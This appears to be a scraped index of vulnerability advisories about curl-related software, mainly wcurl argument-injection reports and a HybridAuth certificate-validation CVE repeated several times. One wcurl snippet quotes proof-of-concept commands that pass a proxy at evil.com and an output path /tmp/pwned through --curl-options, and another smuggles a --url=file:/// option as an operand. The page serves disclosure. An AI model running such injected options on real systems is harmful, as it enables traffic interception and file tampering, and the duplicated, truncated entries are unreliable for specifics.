curl: wcurl treats some URL operands after -- as curl options

I found that wcurl does not always keep operands after -- in a pure URL-data context. The documented way to pass curl options through wcurl is --curl-options, but a value supplied as a URL operand can still reach the final curl command as an option, for example wcurl -- "--url=file:///...". A...

CVE-2026-4587

A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...

EUVD-2026-14425

A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...

Improper Certificate Validation

Overview hybridauth/hybridauth is a PHP Social Authentication Library Affected versions of this package are vulnerable to Improper Certificate Validation through the setCurlOptions processing in src/HttpClient/Curl.php. An attacker can intercept or tamper with HTTPS traffic by supplying malicious...

CVE-2026-4587

A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...

CVE-2026-4587

CVE-2026-4587 affects HybridAuth up to 3.12.2. The issue involves improper certificate validation caused by manipulation of curlOptions in src/HttpClient/Curl.php of the SSL Handler. Exploitation can be remote and the attack has high complexity; no public exploit details or impact beyond the desc...

CVE-2026-4587 HybridAuth SSL Curl.php certificate validation

A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...

CVE-2026-4587

A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...

CVE-2026-4587 HybridAuth SSL Curl.php certificate validation

A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...

Hybridauth 信任管理问题漏洞

Hybridauth is an open-source web-based authentication and authorization software developed by Hybridauth. Versions of Hybridauth 3.12.2 and earlier contained a vulnerability related to trust management. This vulnerability stemmed from incorrect handling of parameters in the curlOptions file withi...

PT-2026-27123

A vulnerability was found in HybridAuth up to 3.12.2. This issue affects some unknown processing of the file src/HttpClient/Curl.php of the component SSL Handler. The manipulation of the argument curlOptions results in improper certificate validation. The attack can be launched remotely. This...

curl: wcurl Argument Injection via Unquoted Variable

when i was code auditing curl i stumbled uppon a vulnerablity that was on wcurl affected version:current step 1: open terminal step 2:run pocs below wcurl --dry-run --curl-options='-x http://evil.com:8080 -o /tmp/pwned' https://example.com/test.txt wcurl --dry-run --curl-options='-o...

Fedora 41 : php-tcpdf (2024-7d6412477b)

The remote Fedora 41 host has a package installed that is affected by multiple vulnerabilities as referenced in the FEDORA-2024-7d6412477b advisory. Version 6.8.0 2024-12-23 - Requires PHP 7.1+ and curl extension. - Escape error message. - Use strict time-constant function to compare TCPDF-tag...

Improper Certificate Validation

Overview Affected versions of this package are vulnerable to Improper Certificate Validation due to the unsafe configuration of CURLOPTSSLVERIFYHOST and CURLOPTSSLVERIFYPEER. Note: This is only exploitable when using libcurl. Remediation Upgrade tecnickcom/tcpdf to version 6.8.0 or higher...

httpstat - Curl Statistics Made Simple

httpstat visualizes curl1 statistics in a way of beauty and clarity. It is a single file Python script that has no dependency and is compatible with Python 3. Installation There are three ways to get httpstat : Download the script directly: wget...

curl security, bug fix, and enhancement update

7.29.0-35 - fix incorrect use of a previously loaded certificate from file related to CVE-2016-5420 7.29.0-34 - acknowledge the --no-sessionid/CURLOPTSSLSESSIONIDCACHE option required by the fix for CVE-2016-5419 7.29.0-33 - fix re-using connections with wrong client cert CVE-2016-5420 - fix TLS...

PHP 5.4.x < 5.4.34 / 5.5.x < 5.5.18 / 5.6.x < 5.6.2 Multiple Vulnerabilities

Binary data 8563.prm...